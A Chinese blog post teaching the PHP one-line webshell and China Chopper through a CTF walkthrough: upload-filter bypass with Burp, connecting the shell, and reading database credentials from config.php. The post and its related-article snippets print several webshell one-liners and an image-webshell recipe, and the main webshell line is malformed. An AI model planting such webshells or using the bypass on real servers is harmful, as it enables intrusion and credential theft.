一句话木马及菜刀的使用

最新推荐文章于 2024-03-16 12:00:00 发布
最新推荐文章于 2024-03-16 12:00:00 发布
阅读量6.8k 收藏 13
点赞数 4
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WQ_BCJ/article/details/81840629
版权

来一波原理:

eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false

<?php  @eval($_POST(‘1’);?>

各种绕过文件上传的姿势:https://blog.csdn.net/wy_97/article/details/76549761

如果你已经成功上传了一个一句话木马文件,那么现在就可以使用菜刀链接了

具体的步骤就是右键添加;输入url加上上传路径及上传文件,具体的可以参考这个例题:
题目链接:https://www.ichunqiu.com/battalion?t=1&r=0

解题步骤

  • 打开网页我们发现需要上传一个文件我们先尝试上传名为1.php的文件(本文件夹中)

此时我们将1.php文件扩展名改为1.jpg然后打开burpsuite抓包抓包之后我们将文件名改为1.php

然后点击forward

发现文件上传成功

  • 我们利用中国菜刀连接目标服务器

菜刀连接上去在里面发现了数据库配置文件config.php,看到了数据库账号密码

https://static2.ichunqiu.com/icq/resources/upload/images/writeup/180319/1521435361_791607.jpg

https://static2.ichunqiu.com/icq/resources/upload/images/writeup/180319/1521435397_791607.jpg

编辑菜刀连接数据库上去拿到flag

https://static2.ichunqiu.com/icq/resources/upload/images/writeup/180319/1521435409_791607.jpg

然后右键点击数据库管理进入到页面在页面上方输入sql语句寻找包含flag的文件

https://static2.ichunqiu.com/icq/resources/upload/images/writeup/180319/1521435414_791607.jpg

 

Ramona&
关注
  • 4
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中国菜刀php一句,中国菜刀之写一句木马变形
weixin_39879674的博客
04-01 852
了解一句脚本的工作原理一句脚本的工作原理:一句恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)一句恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改一句恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据...
PHP一句木马
最新发布
Code-5的博客
04-17 965
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了。WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。3. 利用文件导入的方式进行注入。
菜刀连接图片一句木马
qq_18831583的博客
04-22 2万+
1、先制作图片一句木马: 找好一张图片如”fox.jpg“,并且准备好一句脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句也没有写入到图片当中,如图,一句已经写入刀图片当中: ...
文件上传一句木马,用菜刀进行连接
XY011009的博客
12-02 8918
菜刀工具 提取码:tg6t 关于文件上传 文件上传是指由于网站没有任何过滤或者防护措施有限,而会被上传一些恶意文件,有些用户利用这个漏洞上传一句木马(webshell),上传成功后就可以利用中国菜刀工具来进行对这个网站后一步的攻击。 1.无任何上传限制 这里可以直接上传一句木马然后用菜刀工具进行连接 2.限制了文件类型 有些网站会有对文件类型限制的,发送文件的途中网站会对文件的类型进行检测,看...
上传漏洞(一句木马、中国菜刀使用、DVWA文件上传漏洞利用)
m0_59598029的博客
03-16 543
复制此路径,在菜刀中右键——添加——粘贴到地址栏——后面栏输入密码x——脚本类型选php——编码选gb2312——添加。将文件名修改为10.php,上传文件类型仍然是image/jpeg,可绕过上传过滤。可对图片文件添加一句木马,再修改为.php上传,会解析为图片上传此文件。再右键此站点,选择要执行的命令——选文件管理,可操作此服务器上所有文件。即:http://ip/hackable/uploads/10.php。可以修改php文件后缀为其他,再上传。小马:文件体积小、上传文件、文件修改、文件管理。
PHP之一句木马
bolinmengling的博客
02-27 2万+
一句木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句木马通过P​OST是传入的参数,此处使用的...
PHP网站中的一句木马安全性和防范措施的研究.pdf
01-05
最后,使用中国菜刀对当前一句木马进行连接。 三、PHP一句木马写入数据库或者网页文件的方式 一句木马可以通过SQL注入漏洞或文件上传漏洞写入数据库或者网页文件。 SQL注入漏洞可以使用专用的工具,诸如啊D...
ACCESS导一句拿webshell1
08-08
接着,向表"a"的"a"字段插入一句木马,这里使用的是请求变量(#)执行代码: ```sql insert into a (a) values('(chr(35))%>') ``` 2. **导出为Excel文件**: 将表"a"的内容导出为一个Excel文件,利用以下SQL...
28.文件上传漏洞和Caidao入门及防御原理(一)1
08-04
1. 一句木马原理:一句木马是指非常简短的恶意脚本,能够在被触发时执行特定的命令。例如,PHP的一句木马可能是`($_POST['cmd']); ?>"`,当用户提交包含命令的POST参数时,服务器会执行这些命令。 2. 图片一...
Cool_in_one_hundred_lines_of_code.pdf
08-08
“一句” 一个PHP一句 一句原理 网页请求响应过程 “攻守道” Webshell查杀与拦截 Webshell查杀 内容查杀——文件包含 代码免杀——刨除变量与函数的关联 代码免杀——动态调用函数 代码免杀——自定义函数 ...
PHP实现批量上传单个文件
01-20
首先,我们必须了解菜刀是如何通过一句木马来实现web服务器的文件管理的。 下面是最常见的php一句木马: <?php eval($_POST[1]); ?> 当我们将一句木马上传到web服务器上后,我们就可以直接在...
php一句木马菜刀,如何基于菜刀PHP一句实现单个文件批量上传?
weixin_35741494的博客
03-09 1870
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句木马来实现web服务器的文件管理的。下面是最常见...
菜刀和一句木马
weixin_44720762的博客
05-02 3782
中国菜刀,一个非常好用而又强大的webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 在博主本人看来,对于一名网安小白来说,这段解释对理解webshell没有丝毫帮助。webshell:web:网站 shell:命令语言。执行用户输入的命令或者说执行预先设定好的一连串的命令 也就是一种具有命令效果的网页代码,...
一句木马原理介绍和中国菜刀原理的介绍
Firebasky的博客
06-07 6379
菜刀,c刀,蚁剑都使用过。而且他们的方法基本上差不多。 今天突然心血来潮写来研究一下一句木马菜刀的原理。 下面的原理是自己看其他大佬写的和自己总结的一些介绍。 希望能够帮助老表们~~~ 一句木马原理 我这里就分析一下PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。 我们来看一下经典的一句木马 <?php @eval($_POST['123']); ?> 前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错! 这里是加了@,则不会进行报错 ev
一句木马拿shell原理及菜刀使用
热门推荐
空心菜的博客
04-12 2万+
虽然网上这种文章很多了,但自己不总结一遍不踏实。 一、一句木马 原理 1.以PHP举例 php的eval()函数:eval($str)函数是把$str当做PHP代码执行。 比如: &lt;?php $a = 233; $str = "echo $a;"; eval($str); ?&gt; 输出结果:233 asp、aspx和php的此...
一句木马与中国菜刀
mathor的博客
10-30 1万+
什么是一句木马? 一句木马就是一句简单的脚本语言,常见脚本语言的一句木马如下 php:&lt;?php @eval($_post['pass']);?&gt; asp:&lt;%eval request ("pass")%&gt; aspx:&lt;%@ Page Language="Jscript"%&gt; &lt;%eval(Request.Item["pass"],"u
wordpress测试php一句木马 菜刀!!
yuan-ONE的博客
02-09 1万+
菜刀已经更新了,这个版本没有木马放心使用,下载地址 工具: 菜刀   https://github.com/pythonsky/caidao-20160620-www.maicaidao.com      一句木马php        (各种变样,asp的木马都有具体能不能绕过看你能力了) 将一个木马写入一个执行文件 文件名为admin.php  需要隐蔽性比较强的可以和图片混用
一句木马和中国菜刀的结合拿webshell
weixin_30552811的博客
06-03 1028
什么叫做一句木马: 就是一句简单的脚本语言,一句木马分为Php,asp,aspx等 中国菜刀: 连接一句木马的工具 实验的目的: 通过一句木马来控制我们的服务器,拿到webshell。 实验环境说明: 上传一句木马到网站的根目录下: 然后通过中国菜刀连接: 获取wensell ,文件目录等等: 转载于:http...
excel一句木马
01-26
Excel一句木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值